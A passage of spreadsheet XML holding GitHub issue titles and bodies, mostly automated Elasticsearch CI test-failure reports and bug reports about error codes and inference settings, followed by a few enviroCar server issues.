[main] 3 failures in test test {yaml=reference/snapshot-restore/apis/get-snapshot-api/line_408} (0.6% fail rate in 492 executions) - [main] 2 failures in step part-1-entitlements (18.2% fail rate in 11 executions) - [main] 2 failures in pipeline elasticsearch-pull-request (0.8% fail rate in 236 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/122799</t>
  </si>
  <si>
    <t>[CI] S3RepositoryAnalysisRestIT testRepositoryAnalysis failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #6483 / oraclelinux-8_platform-support-unix](https://gradle-enterprise.elastic.co/s/ru4l67s5oo25i) - [elasticsearch-periodic-platform-support #6483 / rhel-9_platform-support-unix](https://gradle-enterprise.elastic.co/s/wxmfnxna3tcky) - [elasticsearch-periodic #6494 / openjdk17_checkpart2_java-matrix](https://gradle-enterprise.elastic.co/s/qesd6pse7wj2y) - [elasticsearch-intake #18368 / part2](https://gradle-enterprise.elastic.co/s/neqcj3ce345ma) - [elasticsearch-intake #18315 / part2](https://gradle-enterprise.elastic.co/s/n7j4f2amhbfre) **Reproduction Line:**  ./gradlew ":x-pack:plugin:snapshot-repo-test-kit:qa:s3:javaRestTest" --tests "org.elasticsearch.repositories.blobstore.testkit.analyze.S3RepositoryAnalysisRestIT.testRepositoryAnalysis" -Dtests.seed=129F849E2DF6C55B -Dtests.locale=en-VU -Dtests.timezone=Pacific/Tarawa -Druntime.java=23  **Applicable branches:** 8.x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repositories.blobstore.testkit.analyze.S3RepositoryAnalysisRestIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(testRepositoryAnalysis),title:'Test',type:optionsListControl **Failure Message:**  org.elasticsearch.client.ResponseException: method [POST], host [http://[::1]:40217], URI [/_snapshot/repository/_analyze?blob_count=10&amp;seed=3000866559835271268&amp;max_blob_size=1mb&amp;timeout=120s&amp;concurrency=4], status line [HTTP/1.1 500 Internal Server Error] {"error":{"root_cause":[{"type":"amazon_s3_exception","reason":"No such upload (Service: Amazon S3; Status Code: 200; Error Code: NoSuchUpload; Request ID: test-request-id; S3 Extended Request ID: test-host-id; Proxy: null)"}],"type":"repository_verification_exception","reason":"[repository] Elasticsearch observed the storage system underneath this repository behaved incorrectly which indicates it is not suitable for use with Elasticsearch snapshots. Typically this happens when using storage other than AWS S3 which incorrectly claims to be S3-compatible. If so, please report this incompatibility to your storage supplier. Do not report Elasticsearch issues involving storage systems which claim to be S3-compatible unless you can demons [truncated]  **Issue Reasons:** - [8.x] 2 consecutive failures in test testRepositoryAnalysis - [8.x] 5 failures in test testRepositoryAnalysis (2.9% fail rate in 174 executions) - [8.x] 2 failures in step part2 (12.5% fail rate in 16 executions) - [8.x] 2 failures in pipeline elasticsearch-intake (12.5% fail rate in 16 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/123122</t>
  </si>
  <si>
    <t>[CI] EsqlClientYamlIT test {p0=esql/46_downsample/Render stats from downsampled index} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-intake #18609 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/ehthmdupqzvaw) - [elasticsearch-intake #18608 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/sp7u27d6inxfu) - [elasticsearch-intake #18607 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/r4aseno4utv2u) - [elasticsearch-pull-request #58629 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/ipisi37pfvuxm) - [elasticsearch-pull-request #58628 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/sltzei6eqqbs4) - [elasticsearch-pull-request #58626 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/blqxfvgzydkps) - [elasticsearch-intake #18604 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/meg6fa7nfxx3e) - [elasticsearch-pull-request #58620 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/sx724b22dxv2u) - [elasticsearch-pull-request #58619 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/3bdgyxrvlfheo) **Reproduction Line:**  ./gradlew ":x-pack:plugin:esql:qa:server:mixed-cluster:v9.0.0#yamlRestTest" -Dtests.class="org.elasticsearch.xpack.esql.qa.mixed.EsqlClientYamlIT" -Dtests.method="test {p0=esql/40_tsdb/render aggregate_metric_double when missing min and max}" -Dtests.seed=BE21AD0CC036A3B0 -Dtests.bwc=true -Dtests.locale=hy-Armn-AM -Dtests.timezone=America/Phoenix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xpack.esql.qa.mixed.EsqlClientYamlIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Bp0%3Desql%2F46_downsample%2FRender%20stats%20from%20downsampled%20index%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [esql/40_tsdb:460]: expected [2xx] status code but api [esql.query] returned [500 Internal Server Error] [{"error":{"root_cause":[{"type":"unsupported_operation_exception","reason":"Must have all subfields to use aggregate double metric in ESQL","stack_trace":"org.elasticsearch.ElasticsearchException$1: Must have all subfields to use aggregate double metric in ESQL\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.ElasticsearchException.guessRootCauses(ElasticsearchException.java:725)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.ElasticsearchException.generateFailureXContent(ElasticsearchException.java:639)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.build(RestResponse.java:202)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.&lt;init&gt;(RestResponse.java:161)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.&lt;init&gt;(Res [truncated]  **Issue Reasons:** - [main] 3 consecutive failures in step 9.0.0_bwc-snapshots - [main] 9 failures in test test {p0=esql/46_downsample/Render stats from downsampled index} (10.6% fail rate in 85 executions) - [main] 9 failures in step 9.0.0_bwc-snapshots (64.3% fail rate in 14 executions) - [main] 4 failures in pipeline elasticsearch-intake (19.0% fail rate in 21 executions) - [main] 5 failures in pipeline elasticsearch-pull-request (10.9% fail rate in 46 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/123123</t>
  </si>
  <si>
    <t>[CI] EsqlClientYamlIT test {p0=esql/40_unsupported_types/unsupported} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-intake #18605 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/qfsuoxubn442a) - [elasticsearch-pull-request #58628 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/sltzei6eqqbs4) - [elasticsearch-pull-request #58627 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/bvipx2zcq4izu) - [elasticsearch-pull-request #58626 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/blqxfvgzydkps) - [elasticsearch-intake #18604 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/meg6fa7nfxx3e) - [elasticsearch-pull-request #58620 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/sx724b22dxv2u) - [elasticsearch-intake #18603 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/gbdbtv45b2yky) **Reproduction Line:**  ./gradlew ":x-pack:plugin:esql:qa:server:mixed-cluster:v9.0.0#yamlRestTest" -Dtests.class="org.elasticsearch.xpack.esql.qa.mixed.EsqlClientYamlIT" -Dtests.method="test {p0=esql/40_tsdb/render aggregate_metric_double when missing min and max}" -Dtests.seed=FA6D00316BE2360C -Dtests.bwc=true -Dtests.locale=ie -Dtests.timezone=Asia/Dacca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xpack.esql.qa.mixed.EsqlClientYamlIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Bp0%3Desql%2F40_unsupported_types%2Funsupported%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [esql/40_tsdb:460]: expected [2xx] status code but api [esql.query] returned [500 Internal Server Error] [{"error":{"root_cause":[{"type":"unsupported_operation_exception","reason":"Must have all subfields to use aggregate double metric in ESQL","stack_trace":"org.elasticsearch.ElasticsearchException$1: Must have all subfields to use aggregate double metric in ESQL\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.ElasticsearchException.guessRootCauses(ElasticsearchException.java:725)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.ElasticsearchException.generateFailureXContent(ElasticsearchException.java:639)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.build(RestResponse.java:202)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.&lt;init&gt;(RestResponse.java:161)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.&lt;init&gt;(Res [truncated]  **Issue Reasons:** - [main] 6 consecutive failures in step 9.0.0_bwc-snapshots - [main] 2 consecutive failures in pipeline elasticsearch-intake - [main] 7 failures in test test {p0=esql/40_unsupported_types/unsupported} (8.0% fail rate in 88 executions) - [main] 7 failures in step 9.0.0_bwc-snapshots (43.8% fail rate in 16 executions) - [main] 3 failures in pipeline elasticsearch-intake (17.6% fail rate in 17 executions) - [main] 4 failures in pipeline elasticsearch-pull-request (7.7% fail rate in 52 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/123124</t>
  </si>
  <si>
    <t>[CI] EsqlClientYamlIT test {p0=esql/40_tsdb/render aggregate_metric_double when missing min and max} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-intake #18610 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/jui732l3ucva4) - [elasticsearch-intake #18609 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/ehthmdupqzvaw) - [elasticsearch-intake #18608 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/sp7u27d6inxfu) - [elasticsearch-pull-request #58629 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/ipisi37pfvuxm) - [elasticsearch-intake #18605 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/qfsuoxubn442a) - [elasticsearch-pull-request #58628 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/sltzei6eqqbs4) - [elasticsearch-pull-request #58627 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/bvipx2zcq4izu) - [elasticsearch-pull-request #58626 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/blqxfvgzydkps) - [elasticsearch-intake #18604 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/meg6fa7nfxx3e) - [elasticsearch-pull-request #58620 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/sx724b22dxv2u) **Reproduction Line:**  ./gradlew ":x-pack:plugin:esql:qa:server:mixed-cluster:v9.0.0#yamlRestTest" -Dtests.class="org.elasticsearch.xpack.esql.qa.mixed.EsqlClientYamlIT" -Dtests.method="test {p0=esql/40_tsdb/render aggregate_metric_double when missing value}" -Dtests.seed=93BCB41B13F9C043 -Dtests.bwc=true -Dtests.locale=lrc-IQ -Dtests.timezone=Pacific/Truk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xpack.esql.qa.mixed.EsqlClientYamlIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Bp0%3Desql%2F40_tsdb%2Frender%20aggregate_metric_double%20when%20missing%20min%20and%20max%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [esql/40_tsdb:484]: expected [2xx] status code but api [esql.query] returned [500 Internal Server Error] [{"error":{"root_cause":[{"type":"unsupported_operation_exception","reason":"unsupported_operation_exception: Must have all subfields to use aggregate double metric in ESQL","stack_trace":"org.elasticsearch.common.io.stream.NotSerializableExceptionWrapper: unsupported_operation_exception: Must have all subfields to use aggregate double metric in ESQL\n\tat org.elasticsearch.xpack.aggregatemetric.mapper.AggregateMetricDoubleFieldMapper$AggregateMetricDoubleFieldType$AggregateMetricDoubleBlockLoader.reader(AggregateMetricDoubleFieldMapper.java:544)\n\tat org.elasticsearch.index.mapper.BlockDocValuesReader$DocValuesBlockLoader.columnAtATimeReader(BlockDocValuesReader.java:61)\n\tat org.elasticsearch.compute.lucene.ValuesSourceReaderOperator$FieldWork.columnAtATime(ValuesSourceReaderOperator.java:488)\n\tat org.elasticsearch.compute.lucene.ValuesSour [truncated]  **Issue Reasons:** - [main] 12 failures in test test {p0=esql/40_tsdb/render aggregate_metric_double when missing min and max} (13.0% fail rate in 92 executions) - [main] 12 failures in step 9.0.0_bwc-snapshots (70.6% fail rate in 17 executions) - [main] 6 failures in pipeline elasticsearch-intake (26.1% fail rate in 23 executions) - [main] 6 failures in pipeline elasticsearch-pull-request (12.8% fail rate in 47 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/123130</t>
  </si>
  <si>
    <t>[CI] EsqlClientYamlIT test {p0=esql/40_tsdb/render aggregate_metric_double when missing value} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-intake #18610 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/jui732l3ucva4) - [elasticsearch-intake #18612 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/bst4vivib272y) - [elasticsearch-pull-request #58636 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/24gc5ui5kcu3i) - [elasticsearch-intake #18607 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/r4aseno4utv2u) - [elasticsearch-intake #18606 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/6xn6yb6xijsl2) - [elasticsearch-intake #18603 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/gbdbtv45b2yky) **Reproduction Line:**  ./gradlew ":x-pack:plugin:esql:qa:server:mixed-cluster:v9.0.0#yamlRestTest" -Dtests.class="org.elasticsearch.xpack.esql.qa.mixed.EsqlClientYamlIT" -Dtests.method="test {p0=esql/40_tsdb/render aggregate_metric_double when missing value}" -Dtests.seed=93BCB41B13F9C043 -Dtests.bwc=true -Dtests.locale=lrc-IQ -Dtests.timezone=Pacific/Truk -Druntime.java=23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xpack.esql.qa.mixed.EsqlClientYamlIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Bp0%3Desql%2F40_tsdb%2Frender%20aggregate_metric_double%20when%20missing%20value%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [esql/40_tsdb:484]: expected [2xx] status code but api [esql.query] returned [500 Internal Server Error] [{"error":{"root_cause":[{"type":"unsupported_operation_exception","reason":"unsupported_operation_exception: Must have all subfields to use aggregate double metric in ESQL","stack_trace":"org.elasticsearch.common.io.stream.NotSerializableExceptionWrapper: unsupported_operation_exception: Must have all subfields to use aggregate double metric in ESQL\n\tat org.elasticsearch.xpack.aggregatemetric.mapper.AggregateMetricDoubleFieldMapper$AggregateMetricDoubleFieldType$AggregateMetricDoubleBlockLoader.reader(AggregateMetricDoubleFieldMapper.java:544)\n\tat org.elasticsearch.index.mapper.BlockDocValuesReader$DocValuesBlockLoader.columnAtATimeReader(BlockDocValuesReader.java:61)\n\tat org.elasticsearch.compute.lucene.ValuesSourceReaderOperator$FieldWork.columnAtATime(ValuesSourceReaderOperator.java:488)\n\tat org.elasticsearch.compute.lucene.ValuesSour [truncated]  **Issue Reasons:** - [main] 2 consecutive failures in step 9.0.0_bwc-snapshots - [main] 6 failures in test test {p0=esql/40_tsdb/render aggregate_metric_double when missing value} (6.3% fail rate in 95 executions) - [main] 6 failures in step 9.0.0_bwc-snapshots (33.3% fail rate in 18 executions) - [main] 5 failures in pipeline elasticsearch-intake (20.8% fail rate in 24 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/123661</t>
  </si>
  <si>
    <t>malformed CreateIndexRequest should return 400s</t>
  </si>
  <si>
    <t xml:space="preserve"> Elasticsearch Version main  Installed Plugins _No response_  Java Version _bundled_  OS Version _any_  Problem Description When attempting to create an index, its possible to get a server error by some casting failures. We should verify values and return bad request error code  Steps to Reproduce  PUT bad_aliases { "aliases": "I am a bad alias, yo" }   Logs (if relevant) _No response_</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/123729</t>
  </si>
  <si>
    <t>Index creation requests should return 400 on analyzer dictionary missing</t>
  </si>
  <si>
    <t xml:space="preserve"> Elasticsearch Version _any_  Installed Plugins any  Java Version _bundled_  OS Version _any_  Problem Description When attempting to create an index with an analyzer that references a dictionary file (or any file) that isn't present on the system, it should return a bad request.  Steps to Reproduce Try to create an index with hunspell analyzer referencing any locale.  Logs (if relevant) _No response_</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/125668</t>
  </si>
  <si>
    <t>[CI] GCSRepositoryAnalysisRestIT testRepositoryAnalysis failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #7312 / third-party_gcs](https://gradle-enterprise.elastic.co/s/bpxh4c4jgns7k) - [elasticsearch-periodic-platform-support #7313 / rhel-8_platform-support-unix](https://gradle-enterprise.elastic.co/s/4n73fui4qsfbi) - [elasticsearch-pull-request #65096 / part-2](https://gradle-enterprise.elastic.co/s/53utg7lgqu4hu) **Reproduction Line:**  ./gradlew ":x-pack:plugin:snapshot-repo-test-kit:qa:gcs:javaRestTest" --tests "org.elasticsearch.repositories.blobstore.testkit.analyze.GCSRepositoryAnalysisRestIT.testRepositoryAnalysis" -Dtests.seed=E956DE65A2C7CA51 -Dtests.locale=en-KE -Dtests.timezone=Asia/Dhaka -Druntime.java=24  **Applicable branches:** 8.x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repositories.blobstore.testkit.analyze.GCSRepositoryAnalysisRestIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(testRepositoryAnalysis),title:'Test',type:optionsListControl **Failure Message:**  org.elasticsearch.client.ResponseException: method [POST], host [http://[::1]:44177], URI [/_snapshot/repository/_analyze?blob_count=10&amp;seed=5856317475903747225&amp;max_blob_size=10mb&amp;timeout=120s&amp;concurrency=4], status line [HTTP/1.1 500 Internal Server Error] {"error":{"root_cause":[{"type":"repository_verification_exception","reason":"[repository] register [test-register-contended-CbVb9VARRria-l-j_Xc3qg] should have value [10] but instead had value [OptionalBytesReference[MISSING]]"}],"type":"repository_verification_exception","reason":"[repository] Elasticsearch observed the storage system underneath this repository behaved incorrectly which indicates it is not suitable for use with Elasticsearch snapshots. See [https://www.elastic.co/guide/en/elasticsearch/reference/master/repo-analysis-api.html] for further information. Elasticsearch attempted to remove the data it wrote at [temp-analysis-OcWnoI0QSvm-2kJTsnP86A] but may have left some behind. If so, please now remove this data manual [truncated]  **Issue Reasons:** - [8.x] 3 failures in test testRepositoryAnalysis (1.2% fail rate in 246 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/126156</t>
  </si>
  <si>
    <t>[ML] Bedrock Cohere does not support InputType, Truncate</t>
  </si>
  <si>
    <t>This currently returns an error:  PUT _inference/text_embedding/multilingual-cohere-v3-search { "service": "amazonbedrock", "service_settings": { "access_key": "", "secret_key": "", "region": "us-east-1", "provider": "Cohere", "model": "cohere.embed-multilingual-v3" }, "task_settings": { "truncate": "START" } }   POST _inference/text_embedding/multilingual-cohere-v3-search { "input": "The sky above the port was the color of television tuned to a dead channel.", "input_type": "search" }  Though AWS supports it: https://docs.aws.amazon.com/bedrock/latest/userguide/model-parameters-embed.html</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/126275</t>
  </si>
  <si>
    <t>ESQL: silently empty result in case of missing index instead of ValidationException</t>
  </si>
  <si>
    <t>Applies to main, 8.x doesn't reproduce this. Reproducer:  curl -u elastic:password -HContent-Type:application/json 'localhost:9200/test/_doc?refresh' -d ' {"foo": 1} ' curl -u elastic-admin:elastic-password -H "Content-Type: application/json" 'localhost:9200/_query?format=txt' -d' { "query": "from test" }' foo  1 curl -u elastic-admin:elastic-password -H "Content-Type: application/json" 'localhost:9200/_query?format=txt' -d ' { "query": "from test, missingindex" }' foo   Notice how the inclusion of `missingindex` in the index pattern causes the query to silently return an empty result. On 8.x, this (correctly) returns a verification exception.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/126576</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #7602 / opensuse-leap-15_platform-support-unix](https://gradle-enterprise.elastic.co/s/5rdzhkdies3ra) - [elasticsearch-pull-request #67546 / part-2](https://gradle-enterprise.elastic.co/s/r6ga7hzee2swk) - [elasticsearch-pull-request #67528 / part-2](https://gradle-enterprise.elastic.co/s/gtfvb2dqrpi7k) - [elasticsearch-pull-request #67464 / part-2](https://gradle-enterprise.elastic.co/s/rgmicha6x53g6) - [elasticsearch-pull-request #67425 / part-2](https://gradle-enterprise.elastic.co/s/y3cw2idmveoq2) - [elasticsearch-intake #21621 / part2](https://gradle-enterprise.elastic.co/s/2up523edcsmhu) - [elasticsearch-periodic-platform-support #7567 / ubuntu-2004_platform-support-unix](https://gradle-enterprise.elastic.co/s/jy4szgmadtxu2) - [elasticsearch-pull-request #67190 / part-2](https://gradle-enterprise.elastic.co/s/yvsfi6tnh4ckq) - [elasticsearch-pull-request #67191 / part-2](https://gradle-enterprise.elastic.co/s/dfaowj2hjm3iw) - [elasticsearch-pull-request #67180 / part-2](https://gradle-enterprise.elastic.co/s/4skolm3funweu) **Reproduction Line:**  ./gradlew ":x-pack:plugin:snapshot-repo-test-kit:qa:s3:javaRestTest" --tests "org.elasticsearch.repositories.blobstore.testkit.analyze.S3RepositoryAnalysisRestIT.testRepositoryAnalysis" -Dtests.seed=B71B1505C30AE167 -Dtests.locale=vi-VN -Dtests.timezone=US/Michigan -Druntime.java=24  **Applicable branches:** main **Reproduces locally?:** N/A **Failure History:** [See dashboard](https://es-delivery-stats.elastic.dev/app/dashboards#/view/dcec9e60-72ac-11ee-8f39-55975ded9e63?_g=(refreshInterval:(pause:!t,value:60000),time:(from:now-7d%2Fd,to:now))&amp;_a=(controlGroupState:(initialChildControlState:('0c0c9cb8-ccd2-45c6-9b13-96bac4abc542':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:task.keyword,order:0,selectedOptions:!(),title:'GradleTask',type:optionsListControl),'4e6ad9d6-6fdc-4fcc-bf1a-aa6ca79e0850':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:className.keyword,order:1,selectedOptions:!(org.elasticsearch.repositories.blobstore.testkit.analyze.S3RepositoryAnalysisRestIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(testRepositoryAnalysis),title:'Test',type:optionsListControl **Failure Message:**  org.elasticsearch.client.ResponseException: method [POST], host [http://[::1]:34247], URI [/_snapshot/repository/_analyze?blob_count=10&amp;seed=-2481787089920117582&amp;max_blob_size=10mb&amp;timeout=120s&amp;concurrency=4], status line [HTTP/1.1 500 Internal Server Error] {"error":{"root_cause":[{"type":"uncategorized_execution_exception","reason":"Failed execution"}],"type":"repository_verification_exception","reason":"[repository] Elasticsearch observed the storage system underneath this repository behaved incorrectly which indicates it is not suitable for use with Elasticsearch snapshots. Typically this happens when using storage other than AWS S3 which incorrectly claims to be S3-compatible. If so, please report this incompatibility to your storage supplier. Do not report Elasticsearch issues involving storage systems which claim to be S3-compatible unless you can demonstrate that the same issue exists when using a genuine AWS S3 repository. See [https://www.elastic.co/docs/api/doc/elasticsearch [truncated]  **Issue Reasons:** - [main] 15 failures in test testRepositoryAnalysis (3.0% fail rate in 505 executions) - [main] 11 failures in step part-2 (4.6% fail rate in 237 executions) - [main] 11 failures in pipeline elasticsearch-pull-request (4.7% fail rate in 236 executions) - [main] 2 failures in pipeline elasticsearch-periodic-platform-support (22.2% fail rate in 9 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/126709</t>
  </si>
  <si>
    <t>Ingesting documents with Amazon Bedrock inference fails with "Invalid value [ingest] received"</t>
  </si>
  <si>
    <t xml:space="preserve"> Elasticsearch Version Serverless  Installed Plugins _No response_  Java Version _bundled_  OS Version Serverless  Problem Description Ingesting `semantic_text` content using Amazon Titan is returning inference failures. Digging into what might be causing this error, it's potentially a combination [of this line](https://github.com/elastic/elasticsearch/blame/9784e0ec5f57b1eb15c846b499680dd1f735954c/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilter.java#L419) (from 5 months ago) - with a hardcoded InputType.INGEST for chunked inference - combined with [the logic here](https://github.com/elastic/elasticsearch/blame/9784e0ec5f57b1eb15c846b499680dd1f735954c/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/AmazonBedrockService.java#L132) added last month.  Steps to Reproduce Perform the following requests, using Amazon Bedrock credentials with support for `amazon.titan-embed-text-v2:0`:  PUT /_inference/text_embedding/my-bedrock-embeddings { "service": "amazonbedrock", "service_settings": { "access_key": "", "secret_key": "", "provider": "amazontitan", "model": "amazon.titan-embed-text-v2:0", "region": "us-east-1" } } PUT my-test-index { "mappings": { "properties": { "semantic_field": { "type": "semantic_text", "inference_id": "my-bedrock-embeddings" } } } } PUT my-test-index/_doc/1 { "semantic_field": "The Jedi Master Yoda said, do or do not, there is no try" }  The ingest request will return the following inference error:  { "error": { "root_cause": [ { "type": "validation_exception", "reason": "Validation Failed: 1: Invalid value [ingest] received. [input_type] is not allowed for provider [amazontitan];" } ], "type": "validation_exception", "reason": "Validation Failed: 1: Invalid value [ingest] received. [input_type] is not allowed for provider [amazontitan];" }, "status": 400 }  The following script has been verified to work on 8.17.4 but is failing in serverless.  Logs (if relevant) _No response_</t>
  </si>
  <si>
    <t>https://github.com/enviroCar/enviroCar-server/issues/36</t>
  </si>
  <si>
    <t>Incorrect removal of friends</t>
  </si>
  <si>
    <t>Remove friend has a invalid rest endpoint at `DELETE /rest/users/:user/friends` with a entity reference to the removed friend. `DELETE /rest/users/:user/friends/:friend` would be the right choice. Currently `DELETE /rest/users/:user/friends/:friend` would entirely delete the user `friend`. Solution would be to create a new `FriendResource` that extends `UserResource` and overrides the `DELETE` operation. Also there currently isn't any check whether the current user is authorized to do so. Context: - [FriendsResource](https://github.com/car-io/car.io-server/blob/master/rest/src/main/java/io/car/server/rest/resources/FriendsResource.java#L75)</t>
  </si>
  <si>
    <t>https://github.com/enviroCar/enviroCar-server/issues/45</t>
  </si>
  <si>
    <t>Deleting Users</t>
  </si>
  <si>
    <t>Is it possible that your method to delete users doesn't work anymore? I don't get a server response while performing a delete request anymore (the same method works for deleting friends, though)</t>
  </si>
  <si>
    <t>https://github.com/enviroCar/enviroCar-server/issues/52</t>
  </si>
  <si>
    <t>Attempt to create a user with email already in use returns 500 Server Error</t>
  </si>
  <si>
    <t>Upon attempting to create an user with an email address alreay in use in the system, the server returns 500 Server Error. I think this should be 409 :)</t>
  </si>
  <si>
    <t>https://github.com/enviroCar/enviroCar-server/issues/60</t>
  </si>
  <si>
    <t>500 in FriendActivities</t>
  </si>
  <si>
